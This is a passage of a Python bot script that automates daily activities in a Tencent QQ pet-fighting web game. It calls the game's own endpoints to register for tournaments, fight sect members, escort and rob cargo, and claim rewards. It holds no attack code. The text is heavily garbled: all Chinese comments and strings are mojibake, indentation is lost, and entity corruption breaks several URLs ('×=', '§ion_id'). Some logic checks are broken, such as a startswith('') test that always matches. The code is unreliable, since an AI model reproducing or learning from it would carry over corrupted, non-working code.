log.error("Error: ๆ ๆณๅฏๅจ็บฟ็จ")
def gongfeng(log, id=3089):
"""
ไพๅฅ
:param log:
:param id: ่ฆไพๅฅ็ฉๅ็id 3089่ฟ้ญไธน
:return:
"""
gongfeng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=feeddemo&id=%(id)s"
wupinchaxun = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=owngoods&id=%(id)s"
j = requestURL(gongfeng % {"id": str(id)})
msg = j.get("msg")
if str(msg).startswith("ๆฏๅคฉๆๅคไพๅฅ5ๆฌก"):
log.info("ไพๅฅๅฎๆค็ฅ๏ผ" + msg)
else:
# todo ๆๆบ็ซฏ้กต้ข่งฃๆ
response = req.get(wupinchaxun % {"id": str(id)})
html = response.content.decode("utf-8")
pattern = re.compile('ๅ็งฐ๏ผ[\u4e00-\u9fa5]+')
name = pattern.search(str(html)).group()
name = str(name).replace("ๅ็งฐ๏ผ", "")
log.info("ไพๅฅๅฎๆค็ฅ๏ผไพๅฅ1ไธช" + str(name) + "ใ" + msg)
def fenxiang(log):
"""
ไธ้ฎๅไบซ
:param log:
:return:
"""
fenxiangsuoyou = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=sharegame&subtype=6"
response = req.get(fenxiangsuoyou) # ๆๆบ็ซฏๆไฝ๏ผไธๅๅค็
log.info("ๅไบซ๏ผไธ้ฎๅไบซๅฎๆ")
def wulin(log, baomingtype=1):
"""
ๆญฆๆๆฅๅ
:param log:
:param baomingtype: ๆฅๅ็็ฑปๅ 0-ๆๆบๆญฆๆ 1-็ต่ๆญฆๆ
:return:
"""
wulinchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=showwulin"
diannaowulin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=signup&id=%(id)s0306"
shoujiwulin = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=fastSignWulin"
# 1.่ทๅๅฝๅๅฑๆฐ
j = requestURL(wulinchaxun)
period = j.get("period")
if str(baomingtype).startswith("1"):
# 2.1ๆฅๅ็ต่ๆญฆๆ
# print(str(period) + "0306")
# j = requestURL(diannaowulin %{"id" : str(period) + "0306"})
j = requestURL(diannaowulin % {"id": str(period)})
msg = j.get("msg")
log.info("ๆญฆๆๅคงไผ็ต่(็ฌฌ" + str(period) + "ๅฑ)๏ผ" + msg)
elif str(baomingtype) == "0":
# 2.2ๆฅๅๆๆบๆญฆๆ
response = req.get(shoujiwulin)
j = requestURL(wulinchaxun) # ็ดๆฅๆฅ่ฏขๆฅๅ็็ปๆ
msg = j.get("msg")
log.info("ๆญฆๆๅคงไผๆๆบ(็ฌฌ" + str(period) + "ๅฑ)๏ผ" + msg)
else:
pass
def xialv(log):
"""
ไพ ไพฃๆฅๅ
:param log:
:return:
"""
xialv = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=couplefight&subtype=4"
j = requestURL(xialv)
msg = j.get("msg")
log.info("ไพ ไพฃไบ้ธ่ต๏ผ" + msg)
def menpai(username, log):
"""
้จๆดพ
:param username:
:param log:
:return:
"""
menpailiutang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=%(op)s"
menpaishangxiangputong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&type=free&op=fumigate"
menpaishangxianggaoxiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&type=paid&op=fumigate"
menpaimuzhuang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainwithnpc"
menpaitongmen = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainwithmember"
menpaiduihuanzhanshu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchange&type=1249&subtype=2×=%(times)s" # ๆไนฆๅ
ๆข
menpaiqiecuozhangmen = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainingwithcouncil&rank=1&pos=1"
menpaiqiecuoshouzuo = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainingwithcouncil&rank=2&pos=%(pos)s"
menpaiqiecuotangzhu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect&op=trainingwithcouncil&rank=3&pos=%(pos)s"
menpairenwulingjinag = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect_task&subtype=2&task_id=%(task_id)s"
shuxingchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=viewattr&puin=%(puin)s"
chakanhaoyou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=1&sub=1&selfuin=%(selfuin)s"
ledou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&puin=%(puin)s" # ๆๆๅฅฝๅ
menpaiputongxinfasuiji = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sect_art&subtype=2&art_id==%(art_id)s×=1"
menpaiyaoqingsaixinxi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament"
menpaiyaoqingsaibaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=signup"
menpaiyaoqingsaizhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=fight"
menpaiyaoqingsaipaihangbang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=showlastseasonrank"
menpaiyaoqingsailingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=secttournament&op=getrankandrankingreward"
# 1.่ฟๅ
ฅๅ
ญๅ
for item in ["sect_art", "sect_trump", "sect&op=showcouncil", "sect_task", "sect&op=showtraining",
"sect&op=showincense"]:
requestURL(menpailiutang % {"op": str(item)})
# 2.ไธ้ฆ
j = requestURL(menpaishangxiangputong)
msg = j.get("msg")
if not str(msg).startswith("ๆฏๆฅๅ
่ดนไธ้ฆๆฌกๆฐๅทฒ่พพไธ้"):
log.info("้จๆดพ-ไธ้ฆ๏ผ" + msg)
# todo ไผๅ้ป่พ๏ผๅ
ๅคๆญๆฐ้๏ผๅไธ้ฆ
j = requestURL(menpaishangxianggaoxiang)
msg = j.get("msg")
if str(msg).startswith("้จๆดพ้ซ้ฆๆฐ้ไธ่ถณ"):
j = requestURL(menpaishangxianggaoxiang)
msg = j.get("msg")
log.info("้จๆดพ-ๅ
ๆข๏ผ" + msg)
if not str(msg).startswith("ๆฏๆฅไธ้ซ้ฆๆฌกๆฐๅทฒ่พพไธ้"):
log.info("้จๆดพ-ไธ้ฆ๏ผ" + msg)
# 3.่ฎญ็ป
j = requestURL(menpailiutang % {"op": "sect&op=showtraining"})
npc_challenged_times = j.get("npc_challenged_times")
member_challenged_times = j.get("member_challenged_times")
if not str(npc_challenged_times).startswith("1"):
j = requestURL(menpaimuzhuang) # 1ๆฌกๆจๆกฉ
msg = j.get("msg")
log.info("้จๆดพ-ๆจๆกฉ่ฎญ็ป๏ผ" + msg)
if not str(member_challenged_times).startswith("2"):
for i in range(2 - int(member_challenged_times)):
j = requestURL(menpaitongmen) # 2ๆฌกๅ้จ
msg = j.get("msg")
if str(msg).startswith("้จๆดพๆไนฆๆฐ้ไธ่ถณ"):
i = i - 1
j = requestURL(menpaiduihuanzhanshu % {"times": "1"})
msg = j.get("msg")
log.info("้จๆดพ-ๅ
ๆข๏ผ" + msg)
else:
log.info("้จๆดพ-ๅ้จๅ็ฃ๏ผ" + msg)
# 4.้จๆดพๅ็ฃ
j = requestURL(menpaiqiecuozhangmen) # ๆๆ้จ
msg = j.get("msg")
log.info("้จๆดพ-ๅ็ฃ๏ผ" + msg)
for i in range(2):
j = requestURL(menpaiqiecuoshouzuo % {"pos": str(i + 1)}) # ๆ้ฆๅบง1,2
msg = j.get("msg")
log.info("้จๆดพ-ๅ็ฃ๏ผ" + msg)
for i in range(4):
j = requestURL(menpaiqiecuotangzhu % {"pos": str(i + 1)}) # ๆๅ ไธป1,2,3,4
msg = j.get("msg")
log.info("้จๆดพ-ๅ็ฃ๏ผ" + msg)
# 5.้จๆดพไปปๅก
j = requestURL(menpailiutang % {"op": "sect_task"})
task = j.get("task")
for i in range(3):
id = task[i].get("id")
state = task[i].get("state")
if str(state) == "2":
continue
elif str(state) == "1":
j = requestURL(menpairenwulingjinag % {"task_id": str(id)})
msg = j.get("msg")
log.info("้จๆดพ-ไปปๅก้ขๅฅ๏ผ" + msg)
elif str(state) == "0":
if str(id) == "101": # todo ๆไธๆฌกๅ
ถไป้จๆดพๆๅ
j = requestURL(menpailiutang % {"op": "sect"})
selfsect = j.get("sect") # ๆฌไบบ้จๆดพ
j = requestURL(shuxingchaxun % {"puin": str(username)})
level = j.get("level")
j = requestURL(chakanhaoyou % {"selfuin": str(username)})
list = []
info = j.get("info")
for i in info:
# ็ญ้้ๆฌ้จๆดพไธ็ญ็บงๅทฎ10ไปฅๅ
็ๅฅฝๅ,ไธไปๆฅๆชๆๆ
if not str(i.get("sect")).startswith("0") and not str(i.get("sect")).startswith(
selfsect) and not str(i.get("enable")).startswith("0"):
if int(level) - 10 <= int(i.get("lilian")) <= int(level) + 10:
list.append(i)
if len(list) == 0:
for i in info:
# ๅช็ญ้้ๆฌ้จๆดพ,ไธไปๆฅๆชๆๆ
if not str(i.get("sect")).startswith("0") and not str(i.get("sect")).startswith(
selfsect) and not str(i.get("enable")).startswith("0"):
list.append(i)
# print((list))
for i in list:
j = requestURL(ledou % {"puin": str(i.get("uin"))})
if j != None:
log.info("้จๆดพ-ไปปๅก๏ผๆๆๅฅฝๅ " + i.get("name") + "(" + i.get("uin") + ")")
break
elif str(id) == "104": # ไฟฎ็ผ1ๆฌกๅฟๆณ
for i in range(10): # ้ๆบไฟฎ็ผๅฟๆณ๏ผๅฐ่ฏ10ๆฌกไธๆๅๅฐฑ้ๅบ
j = requestURL(menpaiputongxinfasuiji % {"art_id": str(random.randint(101, 118))})
msg = j.get("msg")
if str(msg).startswith("ไฟฎ็ผๆๅ"):
log.info("้จๆดพ-ๆฎ้ๅฟๆณ๏ผ" + msg)
break
j = requestURL(menpairenwulingjinag % {"task_id": str(id)})
msg = j.get("msg")
log.info("้จๆดพ-ไปปๅก้ขๅฅ๏ผ" + msg)
elif str(id) == "109" or str(id) == "110": # 109ๆฅ็ไธๆฌกๅ้จ่ตๆ๏ผ110ๆฅ็ไธๆฌกๅ
ถไป้จๆดพๆๅ็่ตๆ
# ็ปไธๆฅ็6ไธช้จๆดพ็ไฟกๆฏ https://fight.pet.qq.com/cgi-bin/petpk?cmd=visit&puin=
for uin in ["51215628", "1213197377", "526210932", "1532252524", "2648480160",
"294474047"]: # ไธๅธฎ ๅๅฑฑ ๅณจ็ ๅฐๆ ๆญฆๅฝ ๆๆ
requestURL("https://fight.pet.qq.com/cgi-bin/petpk?cmd=visit&puin=" + str(uin))
j = requestURL(menpairenwulingjinag % {"task_id": str(id)})
msg = j.get("msg")
log.info("้จๆดพ-ไปปๅก้ขๅฅ๏ผ" + msg)
else:
pass
else:
pass
# 6.้จๆดพ้่ฏท่ต
# 6.1้ขๅฅ
j = requestURL(menpaiyaoqingsaipaihangbang)
has_reward = j.get("has_reward")
if str(has_reward).startswith("1"):
j = requestURL(menpaiyaoqingsailingjiang)
msg = j.get("msg")
log.info("้จๆดพ้่ฏท่ต-้ขๅฅ" + msg)
# 6.2ๆฅ็่ชๅทฑ็ๆฅๅไฟกๆฏ
j = requestURL(menpaiyaoqingsaixinxi)
in_group = j.get("in_group")
left_fight_times = j.get("left_fight_times")
if str(in_group) == "0": # 0-ๆชๆฅๅ 1-ๅทฒๆฅๅ
j = requestURL(menpaiyaoqingsaibaoming)
msg = j.get("msg")
log.info("้จๆดพ้่ฏท่ต-ๆฅๅ๏ผ" + msg)
# 6.3 ๆๆ
if (dayOfWeek == 3 and hour >= 6) or (dayOfWeek == 1 and hour < 6) or (4 <= dayOfWeek <= 7):
if int(left_fight_times) > 0:
for i in range(int(left_fight_times)):
j = requestURL(menpaiyaoqingsaizhandou)
msg = j.get("msg")
if str(msg).startswith("้จๆดพๆไนฆๆฐ้ไธ่ถณ"):
i = i - 1
j = requestURL(menpaiduihuanzhanshu % {"times": "1"})
msg = j.get("msg")
log.info("้จๆดพ-ๅ
ๆข๏ผ" + msg)
else:
log.info("้จๆดพ้่ฏท่ต-ๆๆ๏ผ" + msg)
# ้ฎ้ผ
def wending(level, isabandon, log):
"""
้ฎ้ผ todo 1.ๆๅฎๆฌกๆฐ
:param level: ่ตๆบ็น็ญ็บง 1-1็บงๅฐ็ 2-2็บง 3-3็บง
:param isabandon: ๅ ้ข่ตๆบ็นๆฏๅฆๆพๅผ 0-ไธๆพๅผ 1-ๆพๅผ
:param log:
:return:
"""
wendingzhuwei1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=cheerregionbattle&faction=10215"
wendingzhuwei2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=cheerchampionbattle&faction=10215"
wendinglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=drawreward"
wendingfangqi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=abandon"
wendingziyuan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=drawreleasereward"
wendinggongji = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tbattle&op=occupy&id=%(id)s"
# ๅฉๅจ-ๅบๅๆทๆฑฐ่ต
if dayOfWeek == 6 and (6 < hour < 19 or (hour == 19 and minute < 30)):
j = requestURL(wendingzhuwei1)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๅบๅๆทๆฑฐ่ตๅฉๅจ๏ผ" + msg)
# ๅฉๅจ-ๅ ๅๆๅ่ต
if (dayOfWeek == 6 and hour >= 21) or (dayOfWeek == 7 and (hour < 19 or (hour == 19 and minute < 30))):
j = requestURL(wendingzhuwei2)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๅ ๅๆๅ่ตๅฉๅจ๏ผ" + msg)
# ้ขๅฅ
j = requestURL(wendinglingjiang)
msg = j.get("msg")
if not str(msg).startswith("ๆฑๆญ๏ผไธๅฑ้ฎ้ผๅคฉไธๆจๆ ๅฅๅฑๅฏ้ขๅ") and not str(msg).startswith("ไฝ ๅทฒ็ป้ขๅ่ฟไธๅฑ้ฎ้ผๅคฉไธๅฅๅฑไบ"):
log.info("้ฎ้ผๅคฉไธ-้ขๅฅ๏ผ" + msg)
if (dayOfWeek == 1 and hour >= 6) or (dayOfWeek == 6 and hour < 6) or (2 <= dayOfWeek <= 5):
# ๆพๅผ่ตๆบ็น
j = requestURL(wendingfangqi)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๆพๅผ่ตๆบ็น๏ผ" + msg)
# ้ข่ตๆบ
j = requestURL(wendingziyuan)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๆถๅ่ตๆบ๏ผ" + msg)
# ๆปๅปไธๆฌก็ญ็บงไธบ{level}็ๅฐ็
j = requestURL(wendinggongji % {"id": generateID(int(level))})
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๅ ้ข่ตๆบ็น๏ผ" + msg)
if isabandon == 1:
j = requestURL(wendingfangqi)
msg = j.get("msg")
log.info("้ฎ้ผๅคฉไธ-ๆพๅผ่ตๆบ็น๏ผ" + msg)
else:
pass
def doushentarun(log, time):
"""
ๆ็ฅๅกๆๆ็บฟ็จ
:param log:
:param time:
:return:
"""
doushentatiaozhan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=0"
fenxiangdoushenta = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=shareinfo&subtype=1&shareinfo=4"
doushentazidong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=1"
basetime = time
if time == 8:
basetime = 10
log.info("ๆ็ฅๅก๏ผๅผๅงๆๆ๏ผๅนถๆฏ10ๅฑๅไบซไธๆฌก")
for i in range(1, 101):
requestURL(doushentatiaozhan) # ๆๆ
sleep(basetime + 1) # ็ญๅพ
ๆๆๅทๅด
if i >= 10 and i % 10 == 2: # ๆฏ10ๅฑๅไบซไธๆฌก
j = requestURL(fenxiangdoushenta)
msg = j.get("msg")
if str(msg).startswith("ๅไบซๆๅ"):
log.info("ๅไบซ๏ผ" + msg)
elif str(msg).startswith("ๆจไปๆฅ็ๅไบซๆฌกๆฐๅทฒ่พพไธ้"):
requestURL(doushentazidong) # ่ชๅจๆๆ
log.info("ๅไบซ๏ผ" + msg)
break
def dianfengrun(log):
"""
ๅท
ๅณฐไนๆๆๆ็บฟ็จ
:param log:
:return:
"""
dianfengchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=0"
dianfengzhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=3"
for i in range(10):
j = requestURL(dianfengchaxun)
result = j.get("result")
if str(result).startswith("-2"):
i = i - 1
break
userinfo = j.get("userinfo")
cd_time = userinfo.get("cd_time")
if int(cd_time) == 0 or int(cd_time) >= 300:
pass
else:
sleep(int(cd_time) + 1)
j = requestURL(dianfengzhandou)
msg = j.get("msg")
if str(msg).startswith("ๆญๅไฝ ") or str(msg).startswith("ๅพ้ๆพ"):
log.info("ๅท
ๅณฐไนๆ-ๆๆ๏ผ" + msg)
elif str(msg).startswith("่ฏทๆจๅ
ๆฅๅ") or str(msg).startswith("ๆจไปๅคฉๆๆๆฌกๆฐๅทฒ็ป่พพๅฐไธ้") or str(msg).startswith(
"ๆจไปๅคฉๅทฒ็ป็จๅฎๅคๆดปๆฌกๆฐไบ"):
log.info("ๅท
ๅณฐไนๆ-ๆๆ๏ผ" + msg)
break
elif str(msg).startswith("ๅทๅดๆถ้ด"):
continue
else:
pass
def jiebiaorun(username, jiebiaolevel, log):
"""
ๅซ้็บฟ็จ todo ไผๅ้ป่พ
:param username:
:param jiebiaolevel:
:param log:
:return:
"""
biaoxingtianxiajiebiaoliebiao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=3"
biaoxingtianxiajiebiao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=14&passerby_uin=%(passerby_uin)s"
j = requestURL("https://fight.pet.qq.com/cgi-bin/petpk?cmd=rank&kind=5&other=" + str(username))
gerenzhanli = float(j.get("total"))
newlist = []
count = 0
while True:
j = requestURL(biaoxingtianxiajiebiaoliebiao)
result = j.get("result")
if str(result).startswith("-1") or str(result).startswith("-2"): # ็ณป็ป็นๅฟ๏ผ้่ฏ fixme ๅบ่ฏฅๆฒก็จไบ
sleep(1)
continue
else:
passerbys = j.get("passerbys") # ่ทๅๅซ้ๅ่กจ
if type(passerbys) is None:
continue
for item in passerbys:
if int(item.get("aow_award")) >= int(jiebiaolevel): # ็ญ้
# ๅคๆญๆๅ๏ผ้ป่ฎคๆ้ซไบๆๅไธ้ซไบ่ชๅทฑ300็
j = requestURL(
"https://fight.pet.qq.com/cgi-bin/petpk?cmd=rank&kind=5&other=" + str(item.get("passerby_uin")))
zhanli = float(j.get("total"))
if (zhanli - gerenzhanli) <= 300:
newlist.append(item)
looted_count = 3
if len(newlist) == 0: # ็ญ้ๅๆ ็ปๆ๏ผ้่ฏ
continue
else: # ๅๅคๅซ้
for car in newlist:
j = requestURL(biaoxingtianxiajiebiao % {"passerby_uin": str(car.get("passerby_uin"))})
msg = j.get("msg")
if str(msg).startswith("่ฟไธช้่ฝฆๅจไฟๆคๆๅ
") or str(msg).startswith(""):
continue;
drop = j.get("drop")
# print("้่กๅคฉไธ-ๅซ้๏ผ" + response.content.decode("gbk")) # fixme
log.info("้่กๅคฉไธ-ๅซ้๏ผ" + drop)
looted_count = j.get("looted_count")
newlist.clear()
if int(looted_count) == 3:
break
newlist.clear()
if int(looted_count) == 3:
break
def doushenta(log):
"""
ๆ็ฅๅก
:param log:
:return:
"""
doushentajieshu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=7&confirm=1"
doushentachaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=towerfight&type=3"
daren = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=ledouvip"
# 1.็ปๆๆ็ฅๅก็ๆๆ
j = requestURL(doushentajieshu)
msg = j.get("msg")
if not str(msg).startswith("้ๆณๆไฝ"):
log.info("ๆ็ฅๅก็ปๆๆๆ๏ผ" + msg)
# 2.่ทๅๅฝๆฅๅฉไฝๆๆๆฌกๆฐ
j = requestURL(doushentachaxun)
day_left_times = j.get("day_left_times") # ไปๆฅๅฉไฝๅ
่ดนๆฌกๆฐ
j = requestURL(daren)
lvl = j.get("lvl")
if str(day_left_times).startswith("1"):
try:
doushenta = threading.Thread(target=doushentarun, args=(log, max(8 - int(lvl), 1)))
doushenta.start()
except:
log.error("Error: ๆ ๆณๅฏๅจ็บฟ็จ")
else:
log.info("ๆ็ฅๅก๏ผไปๆฅๅฉไฝๅ
่ดนๆฌกๆฐ" + day_left_times)
def biaoxingtianxia(username, log, yabiaolevel=2, jiebiaolevel=2):
"""
้่กๅคฉไธ
:param username:
:param log:
:param yabiaolevel:
:param jiebiaolevel:
:return:
"""
biaoxingtianxiayabiaojieguo = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=15"
biaoxingtianxialingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=16"
biaoxingtianxiaqicheng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=6"
biaoxingtianxiayabiaoxinxi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=7"
biaoxingtianxiayabiaoshuaxin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=8"
biaoxingtianxiaxinxi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=cargo&op=0"
# 1.ๅ
ๆฃๆฅๆฏๅฆ้่ฆ้ขๅฅ
j = requestURL(biaoxingtianxiayabiaojieguo)
escort_state = j.get("escort_state") # 0- 1-ๅพ
้ขๅฅ
if str(escort_state).startswith("1"):
j = requestURL(biaoxingtianxialingjiang)
msg = j.get("msg")
log.info("้่กๅคฉไธ-้ขๅฅ๏ผ" + msg)
# 2.ๆผ้ yabiaolevel๏ผ0-่กๅ
ซๆ 1-ๅ้ๆฉ 2-ๆธฉ่ฏๆญ
j = requestURL(biaoxingtianxiaxinxi)
convey_count = j.get("convey_count")
if str(convey_count).startswith("1"): # ไปๆฅๅทฒๆผ้ๆฌกๆฐ
pass
else:
# 2.1่ทๅๅฝๅๆผ้ไฟกๆฏ
j = requestURL(biaoxingtianxiayabiaoxinxi)
reselect_times = j.get("reselect_times")
car_lvl = j.get("car_lvl")
if str(reselect_times).startswith("0") or int(car_lvl) >= int(yabiaolevel): # ๆฒกๅทๆฐๆฌกๆฐไบ๏ผ็ดๆฅๆผ
pass
else:
for i in range(int(reselect_times)):
j = requestURL(biaoxingtianxiayabiaoshuaxin) # ๅทๆฐ
msg = j.get("msg")
car_lvl = j.get("car_lvl")
log.info("้่กๅคฉไธ-ๆผ้๏ผ" + msg)
if (int(car_lvl) >= int(yabiaolevel)): # ๅทๅฐไบ
break
j = requestURL(biaoxingtianxiaqicheng)
msg = j.get("msg")
log.info("้่กๅคฉไธ-ๆผ้๏ผ" + msg)
# 3.ๅซ้
j = requestURL(biaoxingtianxiaxinxi)
looted_count = j.get("looted_count")
if not str(looted_count).startswith("3"):
try:
jiebiao = threading.Thread(target=jiebiaorun, args=(username, jiebiaolevel, log))
jiebiao.start()
except:
log.error("Error: ๆ ๆณๅฏๅจ็บฟ็จ")
# ๏ผ้่ฆๆๅฎid๏ผ
def shiyongwupin(QQnum, id, log):
"""
ไฝฟ็จ่ๅ
็ฉๅ
:param QQnum: ๅฝๅ็ปๅฝqqๅท
:param id: ่ฆไฝฟ็จ็ฉๅ็id
:param log:
:return:
"""
beibaowupinshiyongdiannao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=use&selfuin=%(selfuin)s&id=%(id)s"
response = req.get(beibaowupinshiyongdiannao % {"selfuin": str(QQnum), "id": str(id)})
html = response.content.decode("gbk")
j = json.loads(html)
msg = j.get("joinground")
log.info(msg)
# todo ๆฏๆฅไปปๅก่ชๅจๅฎๆ
def meirirenwuzhixing(header, cookie, id, log):
if id == "13": # ไฝฟ็จไธๆฌก้ฃไนๆฏ,้ฃไนๆฏid 3018
beibaowupinshiyongshouji = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=use&id=%(id)s"
response = req.get(beibaowupinshiyongshouji % {"id": str(3018)})
elif id == "22": # ๅฅฝๅๅ็ฃ๏ผ7ไธชไบบ๏ผ็ญ็บงๅทฎๅฐไบ็ญไบ20๏ผ
pass
elif id == "28": # ็5ไธชๅฅฝๅ่ตๆ
gerenxinxi = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&B_UID=0&sid=&channel=0&g_ut=1&cmd=totalinfo&type=1"
for i in range(5):
j = requestURL(gerenxinxi)
elif id == "29": # ๆญฆๆๅคงไผๆฅๅ๏ผ้ป่ฎคๆฅๅ็ต่ๅบ
pass
elif id == "34": # ๆๆๅๅงๅจ(id=15)
pass
elif id == "36": # ๆๆไฟ็ด็(id=12)
pass
elif id == "61": # ๆไธๆฌก็ปๆๅฅฝๅ
pass
elif id == "67": # ๆๆ3ๆฌก้็ไบบ
pass
elif id == "74": # ๆ็ฅๅก1ๆฌก
pass
elif id == "78": # ๅ็ป3ๆฌก
pass
elif id == "86": # ๆๆ็จ็ฎก(id=16)
pass
elif id == "88": # ๆๆ้ฉฌๅคงๅธ(id=14)
pass
elif id == "89": # ๆๆ้ช็ฅ(id=19)
pass
elif id == "103": # ไผ ๅ6ๆฌก
pass
elif id == "104": # ๅไบซ3ๆฌก
pass
elif id == "107": # ๅนปๅข
pass
elif id == "108": # ๅไบๅฎซ
pass
elif id == "109": # ๅฎๆๆผ้1ๆฌก
pass
elif id == "111": # ๅซ้1ๆฌก๏ผๆ ่ฎบๆๅๅคฑ่ดฅ๏ผ
pass
elif id == "112": # ๅซ้3ๆฌก๏ผๆ ่ฎบๆๅๅคฑ่ดฅ๏ผ
pass
elif id == "114": # ไธ็ฒพๅผบๅ1ๆฌก๏ผ็ฌฆๆ็ณ๏ผ
pass
elif id == "115": # ไธ็ฒพๅผบๅ1ๆฌก๏ผๅฏ้๏ผ
pass
elif id == "11": # ๅผบๅไธๆฌกๅพฝ็ซ
pass
else: # ๆช็ฅไปปๅกid
pass
def wulinmengzhu(id, log):
"""
ๆญฆๆ็ไธป
:param id: ๆฅๅๆญฆๆ็ไธป็็ฑปๅ 1-้ป้ 2-็ฝ้ถ 3-้้
:return:
"""
wulinmengzhuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=view_index"
wulinmengzhulingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&round_id=%(round_id)s&op=get_award§ion_id=%(section_id)s"
wulinemenzhubaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=signup&ground_id=%(ground_id)s"
wulinmengzhujiangcaixuanze = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=guess_up&index=%(index)s"
wulinmengzhujiangcaiqueren = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wlmz&op=comfirm"
# ็ซ็้ขๅฅ
j = requestURL(wulinmengzhuchaxun)
# print(j)
award_info = j.get("award_info")
rest_time = j.get("rest_time")
if award_info != "":
section_id = award_info[0].get("section_id")
round_id = award_info[0].get("round_id")
j = requestURL(wulinmengzhulingjiang % {"round_id": str(round_id), "section_id": section_id})
msg = j.get("msg")
log.info("ๆญฆๆ็ไธป้ขๅฅ๏ผ" + msg)
if not str(rest_time.get("is_final")).startswith("1"):
if dayOfWeek in [1, 3, 5] and 12 <= hour < 24:
# ๆฅๅ
j = requestURL(wulinemenzhubaoming % {"ground_id": str(id)})
msg = j.get("msg")
log.info("ๆญฆๆ็ไธปๆฅๅ๏ผ" + msg)
elif dayOfWeek in [2, 4, 6] and 12 <= hour < 21:
# ็ซ็้ๆฉ
for i in range(8):
j = requestURL(wulinmengzhujiangcaixuanze % {"index": str(i)})
# ็ซ็็กฎ่ฎค
j = requestURL(wulinmengzhujiangcaiqueren)
msg = j.get("msg")
log.info("ๆญฆๆ็ไธป็ซ็๏ผ" + msg)
def yuanzhengjun(log):
"""
ๅธฎๆดพ่ฟๅพๅ
:param log:
:return:
"""
yuanzhengjundaoyuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&op=viewIndex&island_id=%(island_id)s" # 0-4
yuanzhengjunlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&op=getPointAward&point_id=%(point_id)s" # 0-14
yuanzhengjundaoyulingjinag = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&op=getIslandAward&island_id=%(island_id)s" # 0-4
# https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionarmy&point_id=0&op=getPointAward
for i in range(5):
j = requestURL(yuanzhengjundaoyuchaxun % {"island_id": str(i)})
fightInfo = j.get("fightInfo")
if type(fightInfo) is None or fightInfo == "":
i = i - 1
continue
islandAwardStatus = fightInfo.get("islandAwardStatus") # 0-ไธๅฏ้ขๅ 1-ๅพ
้ขๅฅ 2-ๅทฒ้ข
islandInfo = fightInfo.get("islandInfo")
for ii in range(3):
island0 = islandInfo[ii]
if island0.get("awardStatus") == "1":
# ้ขๅฅ
j = requestURL(yuanzhengjunlingjiang % {"point_id": str(i * 3 + ii)})
msg = j.get("msg")
